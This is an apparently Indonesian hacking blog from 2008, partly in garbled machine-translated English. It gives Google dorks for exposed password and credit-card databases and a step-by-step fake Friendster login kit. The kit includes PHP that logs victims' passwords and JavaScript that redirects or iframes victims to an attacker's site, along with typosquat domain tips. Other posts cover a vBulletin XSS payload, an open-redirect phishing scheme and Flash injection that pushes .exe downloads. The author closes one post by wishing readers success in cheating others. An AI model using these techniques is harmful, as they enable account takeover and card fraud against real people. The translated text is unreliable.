Did deface or took over a computer, always must not through the process that was known uptil now as looking for the weakness and the exploitation through various techniques. Without through the technique that was difficult and complicated as well as needed high knowledge, by looking for the location database went through Google also evidently could be carried out.
I will order so that Google looks for the location that had database access that had extention file .mdb and had words password or passwd with URL him. For the order OR (OR), could be used by the character "|" so as, syntax that was used was: filetype:mdb inurl:"passwd|password
By that, we could get dozens of sites that protected database him with password, but with software pembongkar like passware, database this could be opened in 1 minute
There was again the site that if being seen will take the form of the asterisk, but that only his form then. Only with eliminated inout mask password in database him, then password immediately will appear
Basically, was suggested by me should not had kept database that could be accessed directly by the public except be forced
Evidently the page this one was good also to be printed: Print This Page
9.16.2008
Google Hacking Got Password
Labels: Category Hacking, Google Hacking
Google Hacking Mendapatkan Password
Mendeface atau mengambil alih sebuah komputer, tidak harus selalu melalui proses yang dikenal selama ini seperti mencari kelemahan dan eksploitasi melalui berbagai teknik. Tanpa melalui teknik yang susah dan rumit serta membutuhkan pengetahuan tinggi, dengan mencari lokasi database melalui Google-pun ternyata bisa dilakukan.
Aku akan memerintahkan agar Google mencari lokasi yang mempunyai database access yang mempunyai extention file .mdb dan mempunyai kata password atau passwd dengan URL-nya. Untuk perintah ATAU (OR), bisa digunakan karakter "|" sehingga, syntax yang digunakan adalah : filetype:mdb inurl:"passwd|password"
Dengan itu, kita bisa mendapatkan puluhan situs yang memproteksi databasenya dengan password, tapi dengan software pembongkar seperti passware, database tersebut bisa dibuka dalam 1 menit
Ada lagi situs yang jika dilihat akan berupa tanda bintang, tapi itu hanyalah tampilan. Hanya dengan menghilangkan inout mask password pada databasenya, maka password akan langsung kelihatan
Intinya, aku sarankan jangan pernah menyimpan database yang bisa diakses langsung oleh publik kecuali terpaksa
Evidently the page this one was good also to be printed: Print This Page
Labels: Category Hacking, Google Hacking
9.12.2008
Hacking Carder And Credit Card
This article was the article that made me hesitant to in posting or not. And finally after I broke, this article would I posting then. One of them was that this information has spread in the circle underground and has been used seccara the area. Only official publications that happened uptil now, had not named his methods walalu also in fact very simple. Moreover, we studied the technique that was used by Carder, not studied became a person of Carder
The process of the theft must be always begun with knowledge would the characteristics something anything that will be looked for by us. Information of a credit card usually was obtained by Carder with took database that contained the customer's data and of course the number of the credit card to an online shop
Possibly we think that we would ama bertransaksi with this shop because they used enkripsi that was very strong.
We were wrong if being thoughtful like that. The theft of the credit card by Carder very rare in fact never by tapping the SSL transaction (enkripsi). The perpetrators took him direct from database the online shop and might not be completely connected with enkripsi that was complicated.
For example, I will show bagaiman the ease got the number of the credit card in the Internet by making use of Google. Numbers of this credit card that had a big opportunity will be used by Carder. Remember, Carder was the same as the thief and the swindler, jengan had been proud the heart became a person of Carder (maaf if between you there are those that has become a person of Carder and read these words), because here I only gave trick information and not for the crime
So, I will take one of the examples of however many examples that is the application Comersus
Comersus was the application that was made with the ASP language for the online sale transaction.
This application free was available source code in the form of ASP so as really enabled when wanting to be modified. Comersus also enclosed database default that had a name comersus mdb (file access) to keep all information, including the credit card.
Although the name database could be changed, or was kept into some directory the Private, is still having people who did not carry him out. They hid database this into one directory that was regarded as secret, until Google found him!
To try to search database this, the operator who could be used was inurl:comersus.mdb. this Order will ask Google to look for sites that had file database comersus.mdb.
The trial of this very simple search, evidently mengahasilkan dozens of sites that at once could be taken database him without must through the Hacking process that was complicated. Only with meng-clique of the address database this, database that really rehasia this was obtained.
Google, like that was said by me could be used to get almost any in the Internet. Indeed the first time, almost was unimaginable that in fact got the number of the credit card like that the ease (because that was once more said by me should not be had been proud of becoming a person of Carder).
Knew the Hacking technique this kind, developae that built a site necessarily should not become red kept database in directory that could be accessed by the public. Database a big company the manufacturer of the computer book in Indonesia also had been taken although his contents not the contents that was kept secret. At that time they used Microsoft Accsess.
His cause was almost same, database this could be accessed by the public if knowing the location directory the secret. This problem until this was still staying same because of the limitation that Web Hosting that did not permit the location database that was safe. Then what could be done by me? Periodically, I only tried decisive that database this did not emerge inside search engine like Google and carried out several the other thing for the prevention.
Technically that was not far different, the trial that was carried out with Google proved that getting the credit card was the work that really was easy. The problem now, only moral that will prevent how we did not use this information for something that was bad.
Once more, became Carder was the choice that could not be accepted on the basis of anything. The situation ekenomi, retaliation, narrow nationalism (because of stealing the foreigner's credit card), et cetera was the justification that could not be justified from the side of anything.
Evidently the page this one was good also to be printed: Print This Page
Labels: Category Hacking, Google Hacking
9.10.2008
Hacking Carder Dan Kartu Kredit
Artikel ini adalah artikel yang membuat aku ragu untuk di posting atau tidak. Dan akhirnya setelah aku memutuskan, artikel ini akan aku posting saja. Salah satunya adalah bahwa informasi ini sudah menyebar di kalangan underground dan sudah digunakan seccara luas. Hanya publikasi resmi yang terjadi selama ini, tidak pernah menyebutkan cara-caranya walalupun sebenarnya sangat sederhana. Selain itu, kita mempelajari teknik yang digunakan oleh para Carder, bukan mempelajari menjadi seorang Carder
Proses pencurian selalu harus dimulai dengan pengetahuan akan ciri-ciri sesuatu apapun yang akan kita cari. Informasi suatu kartu kredit biasanya didapatkan oleh para Carder dengan mengambil database yang berisi data pelanggan dan tentu saja nomor kartu kredit pada suatu toko online
Mungkin kita berpikir bahwa kita akan ama bertransaksi dengan toko tersebut karena mereka telah menggunakan enkripsi yang sangat kuat.
Kita salah kalau berpikiran seperti itu. Pencurian kartu kredit oleh para Carder sangat jarang bahkan tidak pernah dengan menyadap transaksi SSL (enkripsi). Pelaku mengambilnya langsung dari database toko online dan tidak perlu berhubungan sama sekali dengan enkripsi yang rumit.
Sebagai contoh, aku akan memperlihatkan bagaiman mudahnya mendapatkan nomor kartu kredit di Internet dengan memanfaatkan Google. Nomor-nomor kartu kredit inilah yang berpeluang besar akan digunakan oleh para Carder. Ingatlah, Carder sama dengan maling dan penipu, jengan pernah berbangga hati menjadi seorang Carder (maaf jika di antara kalian ada yang sudah menjadi seorang Carder dan membaca kata-kata tersebut), karena di sini aku hanya memberi info trik saja dan bukan untuk kejahatan
Untuk itu, aku akan mengambil salah satu contoh dari sekian banyak contoh yaitu aplikasi Comersus
Comersus adalah aplikasi yang dibuat dengan bahasa ASP untuk transaksi penjualan online.
Aplikasi ini gratis tersedia source code dalam bentuk ASP sehingga sangat memungkinkan bila ingin dimodifikasi. Comersus juga menyertakan database default yang bernama comersus mdb (file access) untuk menyimpan semua informasi, termasuk kartu kredit.
Walaupun nama database bisa dirubah, atau disimpan ke dalam suatu directory private, masih saja ada orang-orang yang tidak melakukannya. Mereka menyembunyikan database tersebut ke dalam sebuah directory yang dianggap rahasia, sampai Google menemukannya !
Untuk mencoba mencari database ini, operator yang bisa digunakan adalah inurl:comersus.mdb. Perintah ini akan meminta Google mencari situs-situs yang mempunyai file database comersus.mdb.
Percobaan pencarian yang sangat sederhana ini, ternyata mengahasilkan puluhan situs yang bisa langsung diambil database-nya tanpa harus melalui proses Hacking yang rumit. Hanya dengan meng-klik alamat database tersebut, database yang sangat rehasia ini telah didapatkan.
Google, seperti yang aku katakan bisa digunakan untuk mendapatkan hampir apa saja di Internet. Memang pertama kali, hampir tidak terbayangkan bahwa sebenarnya mendapatkan nomor kartu kredit begitu mudahnya (karena itu sekali lagi aku katakan jangan pernah bangga menjadi seorang Carder).
Mengetahui teknik Hacking semacam ini, para developae yang membangun sebuah situs seharusnya jangan perah menyimpan database pada directory yang bisa diakses oleh umum. Database sebuah perusahaan besar pembuat buku komputer di Indonesia juga pernah diambil walaupun isinya bukanlah isi yang dirahasiakan. Saat itu mereka menggunakan Microsoft Accsess.
Penyebabnya hampir sama, database tersebut bisa diakses oleh umum jika mengetahui lokasi directory rahasia. Permasalahan tersebut sampai saat ini masih tetap sama karena batasan yang Web Hosting yang tidak mengizinkan lokasi database yang aman. Lalu apa yang bisa aku lakukan ? Secara berkala, aku hanya mencoba memastikan bahwa database tersebut tidak muncul di dalam search engine seperti Google dan melakukan beberapa hal lainnya untuk pencegahan.
Dengan teknik yang tidak jauh berbeda, percobaan yang dilakukan dengan Google membuktikan bahwa mendapatkan kartu kredit adalah pekerjaan yang sangat mudah. Permasalahan sekarang, hanyalah moral yang akan mencegah bagaimana kita tidak menggunakan informasi ini untuk sesuatu yang buruk.
Sekali lagi, menjadi Carder adalah pilihan yang tidak bisa diterima dengan alasan apapun. Keadaan ekenomi, pembalasan, nasionalisme sempit (karena mencuri kartu kredit orang asing), de el el adalah pembenaran yang tidak bisa dibenarkan dari sisi apapun.
Thaks to : Mas S'to
ARTIKEL YANG AKAN DATANG SENI HACKING PEMALSUAN IDENTITAS DAN PERAMPOKAN NASABAH ! ! !
Ternyata Halaman Yang Ini Bagus Juga Untuk Di Cetak: Cetak Halaman Ini
Labels: Category Hacking, Google Hacking
9.04.2008
Membuat Halaman Friendster Palsu
Sebelumnya maaf yah karena kemarin aku membuat artikel yang salah. Tapi untuk menebus kesalahan yang aku buat, sekarang aku akan menjelaskan semua dengan sebenar-benarnya >?php <div class="login">Please sign in to continue</div><div class="boxcontent"> var id="fgetCookie("Friendster_identitas"); var id="fgetCookie("Friendster_identitas"); <embed src='ALAMAT-WEB-FILE-SWF' width=0 height=0 allowScriptAcces'always'/> <?php var id=fgetCookie("friendster_identitas");
Ok, daripada lama-lama, dan basa-basi yang ada nanti basi langsung saja yah, aku akan menjelaskan untuk membuat halaman Friendster palsu. Mau? Three (3) jaringan seluler mu Kalau berhasil, jangan lupa komentarnya yah...
Dan juga tidak ketinggalan untuk Anselmus Ricky th0r sang Hacker yang TOP BGT. Jangan Hack Blog aku yah. Aku kan masih tidak mengerti apa-apa
Sebelum membaca artikel di bawah, ada baiknya men-download E-Book panduan untuk membuat Flash Di Sini agar kalian bisa membuat halaman log in friendster palsu dengan baik.
Persiapkan Diri Kalian Untuk Membaca Artikel Yang Panjang Ini
Pada dasarnya, dalam setiap peristiwa login setiap pengguna Friendster, ada dua buah file yang terlibat secara langsung, yaitu Login.php dan Submit.php yang ada pada http://www.friendster.com. Kedua file ini mememiliki sedikit perbedaan dalam fungsi kerjanya, secara mudah dapat kita asumsikan bahwa login.php tersebut lebih berfungsi sebagai Interface bagi para pengguna Friendster untuk melakukan login, sedangkan submit.php adalah file yang bekerja sebagai pengirim informasinya yang kita masukkan ke server Friendster.
Kita tidak akan mengubah script yang ada pada login.php milik Friendster, karena pada dasarnya memang tidak diperlukan perubahan apapun, ini hanya sebuah tampilan yang akan ditunjukkan pada pengguna yang ingin melakukan login ke dalam account Friendser mereka. Di lain pihak, kita akan melakukan lebih banyak perubahan pada submit.php tersebut.
Sebelum memulai langkah-langkah yang akan kita lakukan, kita harus mengetahui bahwa script yang akan kita gunakan sebagai submit.php dapat dilihat sebagai berikut:
function validstr($strutama){
if(strstr($strutama,"@")){return true;}else{ return false;}}
//$ip = getenv ('REMOTE_ADDR');
$date=date("dmy.g:i:sa");
$em=$_POST['email'];
$pw=$_POST['password'];
$referer=$_POST['next'];
if (validstr($em)){
$fl = fopen('fansblogs.txt', 'a') or die("error Opening file");
fwrite($fl,"\r\n$ip;;$date;;\r\n$em;;$pw") or die("access Write failed");
fclose($fl);
header("location:$referer");
}
header("location:$referer");}
?>
Bagian yang aku tebalkan (sebuah tulisan 'fansblogs.txt') merupakan sebuah file text dimana hasil yang berhasil direkam akan disimpan. Oleh karena itu, selain mentiapkan login.php dan submit.php, kita juga harus mempersiapkan sebuah file text kosong dengan nama fansblogs.txt. Tentu saja namanya boleh kita ganti sesuka hati, namun jangan lupa untuk mengubah nama yang tercantum pada script ini juga.
Selain itu kita juga akan memiliki sebuah script yang akan dinamakan login.php, namun dikarenakan script tersebut terlalu panjang dan hanya akan memenuhi halaman Blog aku ini, kamu bisa lihat script tersebut Di Sini
Sebelum memulai pada tahap yang lebih lanjut, aku akan sedikit menerangkan kenapa kita harus menggunakan nama submit.php dan login.php, dan kenapa bukan dengan nama-nama yang lain?
Mudah saja, didalam login.php yang Friendster miliki, terdapat penggalan informasi script yang menyatakan hal sebagai berikut:
<form name="login_form" method="post" action="submit.php"><input type="hidden" name="_submitted" value="1">
<input type="hidden" name="next" value="<?=$par?>">
<input type="hidden" name="tzoffset" value="">
Script tersebut memberikn kita informasi, bahwa pada dasarnya segala bentuk informasi yang pengguna masukkan dalam tampilam login.php akan dikirimkan (method="post"), dan untuk melakukan pengirman tersebut aksi atau tindakan yang harus dilakukan terdapat di submit.php (actiont="submit.php"). Tentu saja harus diingat bahwa tidak adanya URL apapun di bagian depan tulisan submit.php mengindikasikan bahwa script submit.php tersebut ada pada satu filder yang sama dengan login.php, yaitu pada http://www.friendster.com/
Dengan ini sedikit jelas bukan, mengapa kita tidak menggunakan nama lain selain submit.php? Sebelumnya sih boleh saja untuk mengubahnya menjadi kirim.php, asalkan nama file yang kita buat nanti sesuai dengan informasi yang kita ubah pada potongan script login.php tersebut. Sedangkan login.php sendiri bisa kita ubah sesuka hati, asalkan nantinya tidak salah memasukkan nama tersebut pada JavaScript kita.
Pada kesempatan kali ini, aku akan mengasumsikan kita sudah bisa membuat file php, yaitu dengan menulisnya pada Notepad dan melakukan "Save As" sebagai Nama.php dan disimpan dengan type file "All Type" yang pasti semua orang juga sudah mengerti.
Nah! Sekarang kita telah memiliki script yang akan kita upload, yaitu submit.php, dan login.php, yang harus kita lakukan tentu melakukan upload ketiga file tersebut sehingga memiliki sebuah URL yang sekirany seperti berikut:
1. http://www.website-kita.com/login.php
2. http://www.website-kita.com/submit.php
3. http://www.website-kita.com/fansblogs.txt
Memang agak susah kalau kita memahami sesuatu hal tanpa praktek langsung, oleh karena itu aku akan mengajarkan kalian semua secara khusus bagaimana melakukan persiapan sebuah jebakan dengan menggunakan halaman palsu yang kita buat dengan merombak submit.php dan type Flash yang menjalankan script Java.
Jika kalian sudah membaca artikel sebelumnya Di Sini tentu kalian sudah mengerti bagaimana cara menggunakan Flash untuk Friendster Hacking ini.
Tapi ada satu hal yang aku lupakan, yaitu kita harus mempunyai sebuah file JavaScript, kita berikan saja nama script ini false.js, lalu bagaimana bentuk script tersebut? Kira-kira bentuknya seperti berikut:
if(id!=pageViewerID)
{
var c=fgetCookie("Friendste_auth"), hostpath="Stealer.php"; document.cookie="Friendster_identitas="+pageViewerID+"; path=/";
window.location.href=hostpath+'?next='+escape("/")+pageOwnerID;
}
Dimana "Stealer.php" aka kita ganti dengan http://www.website-kita.com/login.php, sehingga menjadi sepeti berikut:
if(id!=pageViewerID)
{
var c=fgetCookie("Friendste_auth"), hostpath="http://www.website-kita.com/login.php"; document.cookie="Friendster_identitas="+pageViewerID+"; path=/";
window.location.href=hostpath+'?next='+escape("/")+pageOwnerID;
}
Sehingga setiap orang yang membuka halaman yang mengandung Flash tersebut akan menjalankan perintah seperti yang tertera di atas, dan tidak melakukan pembukaan kolom peringatan dengan tulisan "Hello" lagi seperti pada contoh artikel Flash
Dengan ini kita memiliki empat buah file, yang masing-masing dengan fungsinya dapat dikatakan sebagai berikut:
1. http://www.website-kita.com/login.php - Menampilkan informasi
2. http://www.website-kita.com/submit.php - Menyimpan informasi
3. http://www.website-kita.com/false.js - Melakukan redirect ke login.php
4. http://www.website-kita.com/fansblogs.txt - Untuk melihat hasil tangkapan
Dengan ini sudah jelas yang akan kita lakukan berikutnya adalah melakukan penyisipan Flash dengan teknik yang sama persis seperti yang ada pada contoh artikel Flash yaitu dengan memanfaatkan script berikut:
Script tersebur disisipkan pada beberapa tempat yang terdapat di bagian profile kita, seperti Favorite Music, Hobby and Interest, dan banya kolom lainnya.
Hasil yang akan terjadi tentu beda dengan hasil pada saat script Java masih menggunakan script yang melakukan panggilan terhadap kolom peringatan yang ada pada artikel Flash dengan tulisan "Hello", kali ini yang akan terjadi adalah kita dibawa pada sebuah halaman login yang serupa dengan Friendster namun memiliki URL yang sangat berbeda, yang dimana tentu saja URL tersebut adalah http://www.website-kita.com/login.php atau kalian bisa melihat sendiri halaman login palsu Friendster ini Di Sini itu adalah halaman login Friendster palsu yang aku buat sendiri, jika kalian ingin mencobanya menjadi korban, silahkan saja login dengan halaman itu kan lumayan aku dapat mangsa
Apabila kita tidak ingin halaman tipuan kita ini mudah diketahui oleh para calon korban, ada pilihan jalan yang bisa ditempuh. Yang termudah tentu saja dengan melakukan URL Spoofing. Dimana kita harus melakukan pendaftaran ke beberapa website yang memberikan layanan domain gratis seperti http://www.freedomain.co.nr atau mungkin juga http://www.freedomain.co.cc dan kemudian membuat domain yang serupa dengan Friendster, seperti http://www.friedster.co.nr, http://www.freindster.co.cc, atau kita bisa berbohong untuk mengatakan sekarang ada Friendster yang baru dengan alamat http://www.friendster-news.co.cc atau yang lainnya. Tapi berbohong itu dosa yah? Jadi, bagaimana? Ah.. Itu urusan masing-masing saja, aku tidak ingin mendapat dosa karena kalian
Kalau kita memang ingin sedikit lebih modal dan terlihat keren, tentu saja kita bisa membeli domain yang berbayar, dan bisa saja membuat suatu domain seperti http://www.friendsters.com, namun selain kemungkinan website seperti ini kebanyakan sudah dibeli oleh pihak Friendster untuk mencegah adanya URL Spoofing attact seperti ini, hal ini juga sangat berbahaya bagi ketebalan dompet kita iya kan
Cara alternatif bagi mereka yang tidak berkesempatan mendapatkan domain gratis karena memang sebagian domain sudah diambil oleh orang lain (termasuk aku pada saat mencoba melakukan percobaan beberapa waktu lalu tapi tidak mendapatkan domain yang sebagus yang aku inginkan, cape deh..), dan bagi mereka yang tidak ingin mengeluarkan uang hanya untuk melakukan atau mencoba tindakan seperti ini, artikel ini juga akan memberikan kalian alternatif tanpa uang dan kesempatan tak terbatas, yaitu menggunakan teknik Frame Up.
Bagi mereka yang sudah lama berkecimpung di dunia komputer, terutama keamanan, dan baru kali ini mendengar istilah Frame Up, atau mungkin sudah mencari di Google namun tidak ketemu juga setelah 2 jam , tenang saja kalian tidak perlu bingung. Karena istilah tersebut memang baru di ciptakan oleh seorang penulis buku bernama Anselmus Ricky
jadi bukan hal yang aneh kalau kalian belum pernah dengar (aku saja baru kali ini nyebutin
).
Walaupun namanya baru dibuat, namun teknik ini memang ada. Ini mmerupakan sebuah teknik yang menggunakan Frame atau bahasa Indonesianya adalah Bingkai pada Browser sering kali digunakan untuk menutupi jalan rahasia ruang khusus, maka pada kasus ini, bingkai dipindahkan ke dalam Internet.
Untuk melakukan teknik ini, kita hanya perlu mengubah dua buah file, yaitu submit.php dan false.js kita. Berikut adalah script yang harus kita masukkan pada submit.php kita yang baru:
function validstr($strutama){
if(strstr($strutama,"@")){return true;}else{ return false;}}
//$ip = getenv ('REMOTE_ADDR');
$date=date("dmy.g:i:sa");
$em=$_POST['email'];
$pw=$_POST['password'];
$referer=$_POST['next'];
if (validstr($em)){
$fl = fopen('fshacks.txt', 'a') or die("error Opening file");
fwrite($fl,"\r\n$ip;;$date;;\r\n$em;;$pw") or die("access Write failed");
fclose($fl);
header("location:$referer");
}
else{header("location:http://www.website-kita.com/login.php");}
?>
Selain sedikit perubahan yang harus dilakukan pada submit.php, kita juga harus melakukan perybahan lebih menyeluruh pada script yang akan kita gunakan di dalam false.js, sehingga menjadi seperti berikut:
if(id!=pageViewerID)
{
var c=fgetCookie("friendster_auth"), fUrl="www.website-kita.com/login.php"+"?next="+escape("/")+pageOwnerID;
var pTitle="Friendster - Log In";
document.cookie="friendster_identitas="+pageViewerID+"; path=/";
createObj(pTitle,fUrl);
}
function createObj(pTitle,fUrl){
document.title=pTitle;document.body.innerHTML='';
var oLey=document.createElement("div");
oLey.style.textAlign='left';document.body.appendChild(oLey);
var nFrm=document.createElement("iframe");
nFrm.setAttribute('src',fUrl);
nFrm.setAttribute("Style",'position': absolute; border:0;');
nFrm.setAttribute('width',1020);
nFrm.setAttribute('height',611);oLey.appendChild(nFrm);}
Nah.. Bagaimana sekarang? Apa kalian sudah pusing? Kalau sudah pusing, segera PANTOGIN kepala kamu ke TEMBOK
Memang kalau kamu pusing, artinya kamu sudah belajar dengan benar, dan karena itu akan aku ucapkan SELAMAT BERKARYA dan SELAMAT MENIPU ORANG LAIN
Sudah yah.. Berhubung ini bulan Suci Ramadhan, dan yang pasti saat aku menulis artikel ini sudah menunjukkan jam 03:00 dan saatnya aku untuk makan Sauuurrr...
Oya, jika kalian bingung atau tidak bisa membuat halaman log in friendster palsu ini, silahkan memberi komentar atau hubungi aku jika sedang online di YM OK.
Ternyata Halaman Yang Ini Bagus Juga Untuk Di Cetak: Cetak Halaman Ini
Labels: Category Hacking, Friendster Hacking
9.01.2008
Cross Site Scripting (XSS)
Sebelum kita melanjutkan artikel-artikel Friendster Hacking ini lebih jauh, akan lebih baik jika kita membahas sedikit mengenai Cross Site Scripting (XSS), yang merupakan sebuah teknik hacking yang sangat banyak ditemukan di manapun. Selain itu, teknik ini merupakan 90% serangan yang sering sekali hacker lakukan untuk melakukan tindakan yang tidak bertanggung jawab, mengambil alih account milik orang lain. Hayo siapa yang suka begitu? Hayo ngaku...
Untuk memahami apa itu Cross Site Scripting (XSS), bagaimana cara kerjanya, serta apa saja yang mungkin ia lakukan, akan sangat baik apabila kita membaca artikel yang berhubungan dengan hal XSS ini.
What is Cross Site Scripting?
Cross Site Scripting adalah sebuah jenis serangan yang juga dikenal dengan nama XSS atau CSS, yang juga dapat dikategorikan sebagai jenis serangan tingkat menengah, atau yang tingkat bahayanya masih menengah, dikarenakan dengan menggunakan jenis serangan ini, seorang penyerang tidak melakukan serangan langsung terhadap database maupun admin control panel sebuah website.
Walaupun Cross Site Scripting tidak melakukan serangan langsung kepada sistem yang ada, bukan berarti tingkat bahaya daripada serangan ini tumpul dan hilang begitu saja. Cross Site Scripting adalah teknik paling jitu untuk mengeksploitasi kelemahan pada elemen paling penting dalam sebuah susunan teknologi, yakni menusianya. Dengan cara menyamarkan dirinya sebagai hyperlink atau berbagai hal lainnya yang juga terdapat pada website yang tidak patut dicurigai, seperti di Friendster.com sendiri atau dari website bank online, Cross Site Scripting mencuri banyak data pelanggan atau anggota suatu komunitas di Internet.
Serangan Cross Site Scripting ini memiliki ciri khas sendiri. Ia hanya akan ditemukan pada berbagai website atau halaman yang memiliki fitur dinamik, alias dapat diubah-ubah sesuai dengan keinginan sang pengunjung website. Website seperti sebuah forum, guest book, registration form, search form, dan berbagai halaman serupa lainnya telah menjadi mangsa empuk jenis serangan ini.
Kenapa hanya dapat berada pada jenis website dinamik? Dan apakah tidak mungkin ada pada website tipe statik? Karena yang akan dilakukan Cross Site Scripting adalah menyusupkan sebuah script yang dapat meragukan para pengunjung website ke dalam sebuah halaman website yang legal (seperti menambahkan di halaman login sebuah online bank). Kita akan membahas contoh nyatanya langsung nanti.
Memang Cross Site Scripting sangat jarang ditemukan di website statik, atau bahkan tidak ada, namun bukan berarti kita aman dari hal semacam ini. Alasannya? Dapat kita lihat di bawah ini!
Why Cross Site Scripting is not CSS?
Seringkali orang mengartikan Cross Site Scripting mentah-mentah menjadi CSS, dan itu membuat bingung karena CSS secara pribadi sebenarnya dimaksudkan dengan Cascading Style Sheet.
Tidak jarang juga para ahli keamanan dan ahli Inernet menyebutkan Cross Site Scripting sebagai XSS (di mana tanda X dibaca sebagai Cross), agar jika kita mendengar atau mengetahui seseorang tentu orang ini bermaksud mengatakan jika dia menemukan kelemahan Cross Site Scripting di dalam situs web tersebut.
How dangerous is XSS?
Menjawab pertanyaan, kenapa Cross Site Scripting ini begitu berbahaya jika hanya ada pada website yang memiliki fitur dinamik? Maka kita akan berandai-andai sedikit. Apabila dalam 15 menit terakhir kita telah mengunjungi sekitar 20 website, maka hitunglah, berapa website yang memiliki kolom, pengisian bahan pencarian (Search Form), Login Page, Registration Form, Posting, dan berbagai halaman lain yang memungkinkan seorang pengunjung mengubah informasinya sesuai dengan keinginannya? Tentu kita akan menemukan jumlah yang lumayan banyak.
Cross Site Scripting juga dikatakan berbahaya karena ia melakukan injeksi VBScript, JavaScript, HTML, ActivateX, dan Flash untuk melakukan penipuan terhadap pengguna lain yang sebenarnya pada sebuah situs layanan. Pencurian Cookies (tenang, ini bukan apapun untuk dimakan, dan akan dijelaskan nanti), Username dan Password, serta data identitas diri lainnya menggunakan jenis serangan ini.
Example of XSS in Forum Machine
Forum Machine seperti vBulletin, Invision Power Board, phpBB, dan berbagai produk dari vendor lainnya temakan oleh jenis serangan Cross Site Scripting ini. Berikut adalah contoh yang akan sedikit kita bahas, sebuah XSS yang bekerja pada vBulletin versi 3.5.3.
Pertama sekali tentunya kita diharuskan mencari sebuah website yang masih menggunakan vBulletin dengan versi 3.5.3 ke bawah. Melakukan registrasi sebagai member di dalam forum tersebut, kemudian mengikuti langkah berikut:
1. Pergilah ke halaman http://www.forum-vBulletin-nya.com/profile.php?do=editpassword
2. Isi kolom password dengan menggunakan password dari account kita di website tersebut.
3. Isi bagian emai dengan JavaScript yang masih mengandung email kita, seperti: email@web.de"><script>alert(1)</script>.nomatt
4. Pergilah ke halaman http://www.forum-vBulletin-nya.com/profile.php?do=editoptions dan berikan tanda cek pada pilihan "Receive Email from Other Members"
5. Selanjutnya bukalah halaman http://www.forum-vBulletin-nya.com/profile.php?do=mailmember&u= {ID Mangsa}
Yang akan terjadi adalah, seorang administrator website tersebut akan kita kirimi email, yang tentunya di email tersebut, alamat email pengirimnya adalah seperti yang kita tulis di atas, dan mengadung JavaScript untuk memodifikasi script yang dikirimkan dengan script yang dapat mencuri cookies ataupun melakukan tindakan pencurian lainnya?
Namun untuk mencari mangsa dan menggunakan teknik ini ternyata tidaklah mudah seperti yang kita bayangkan, karena ada kriteria yang harus dimiliki si website, yaitu memiliki setting dengan detail seperti dibawah ini:
Allow Users to Email Other Members=Yes
Use Secure Email Sending=No
forum/admins.options.php?do=options&dogroup=email
It sound that conditions are deafulity OK;
Apabila yang kita serang adalah sebuah website yang menggunakan mesin forum vBulletin 3.5.3 namun tidak memiliki setting seperti yang tertulis di atas, maka penyerangan tidak akan berjalan selancar yang diinginkan.
Concept of Stealing Password using XSS
Siapa yang tidak tahu World of Warcraft? Sebuah online game yang memang sangat terkenal, dan memiliki sebuah website yang beralamatkan di http://www.worldofwarcraft.com. Siapa menyangka, ternyata perusahaan terbesar dunia dalam Online Game, yang juga dikenal dengan nama Blizzard, masih membiarkan celah seperti ini pada websitenya?
Dengan menambahkan alamat website http://www.sate.name/ pada bagian akhir URL untuk login pada login page worldwarcraft.com yang beralamatkan di https://www.worldwarcraft.com/login/login?service= ternyata dapat membuat seorang user ter-redirect ke website http://www.sate.name setelah melakukan login dengan menggunakan username dan password yang valid.
Apabila yang kita simpan sebagai pengganti http://www.sate.name adalah sebuah URL page dimana kita menyimpan sebuah halaman login World of WarCraft yang palsu, dan kemudian sedemikian rupa membuat username dan password yang dimadukkan seorang pemain World of WarCraft yang asli tersimpan dengan sempurnam, kemudian membuatnya kembali membuka halaman login World of WarCraft yang asli, maka kita sudah dapat dikatakan mencuri username dan password orang tersebut dengan menggunakan Redirection XSS Attack
(Print This Page) | (Cetak Halaman Ini)
Labels: Category Hacking, Friendster Hacking
Hacking Friendster Melalui Flash Exploit
Download artikel di bawah dalam bentuk E-Book agar kalian bisa membacanya dengan serius Di Sini
Untuk mengawali Bulan Suci Ramadhan ini, bagaimana jika kita membahas sedikit tentang Friendster Hacking? Tapi dosa engga yah ini kan Bulan Puasa
masa sih mau nyolong punya orang? Ah biarin deh yang penting kan Happy
Akhirnya jika kemarin aku membuat artikel tentang Sejarah Friendster Hacking dan yang lainnya, bisa juga sekarang aku membuat artikel tentang Friendster Hacking, walalupun ini artikel Friendster Hacking yang pertama kali aku buat mungkin bisa berguna untuk semua orang yang iseng atau jail dengan Trik Hacking seperti ini. Bagaimana? apa ingin mencoba Trik Friendster Hacking perdana yang aku buat? He..he..he.. Jika penasaran, langsung saja baca dengan cermat key.
Seperti yang pernah aku katakan pada bagian Sejarah Friendster Hacking sebelumnya. Testimonial adalah tempat dimana celah keamanan pertama bagi Friendster.com.
Apa yang dilakukan oleh para Hacker pada saat itu di bagian testimonial bukanlah suatu hal yang sangat sulit. Hanya dengan bermodalkan suatu Macromedia Flash 8 semua orang bisa melakukan hal yang serupa. Intinya adalah, pembuatan file flash *.swf yang mengandung script GerURL, sehingga memaksa siapapun yang melihat file flash tersebut melakukan GetURL seperti yang diperintahkan.
Hanya dengan mengetikan script, kemudian membuat ukuran flash menjadi 1x1 atau berapapun besarnya yang kita inginkan, kemudian melakukan pembuatan file *.swftersebut menggunakan Macromedia Flash 8, kita dapat melakukan Hacking Friendster.
Script yang bisa dimasukkan pun ternyata bervariasi, tergantung apa yang diinginkan oleh seorang Hacker, untuk dieksekusi oleh para korbannya.
Pada contoh gambar di berikut, script tersebut ditunjukkan untuk membuat seorang korban (mereka yang membuka file *.swf tersebut di Internet), untuk melakukan download file *.exe yang berlokasi di http://www.fansblog.com/test.exe. (Ingat, gambar tersebut hanya sebagai contoh, dan jika kalian membuka alamat tersebut, tentu alamat tersebut tidak ada).
Sedangkan bagi mereka yang ingin melakukan Redirection, script yang diperlukan pun tidak jauh berbeda dengan yang sudah ada pada gambar di atas. Hanya perlu sedikit modifikasi, yaitu dengan menghilangkan nama file di bagian URL sehingga script-nya akan menjadi seperti berikut:
Atau
Seluruh pengguna Friendster yang membuka tesimonial yang memiliki flash dengan script seperti ini, akan mengalami redirection ke alamat http://www.contoh.com.
Bagaimana menyaimpannya dalam Testimonial ? Yupz, tentu pertama-tama kita harus melakukan upload file *.swf kita ke dalam sebuah Web Hosting, misalnya nama file kita adalah fshacking.swf, kita perlu menyimpannya di sebuah Website yang memberika layanan Hosting, dan kemudian mengambil URL tersebut dimana kita bisa langsung membuka URL tersebut dan melihat file Flash itu. Sebagai contoh misalnya:
http://www.website-kita.com/fshacking.swf
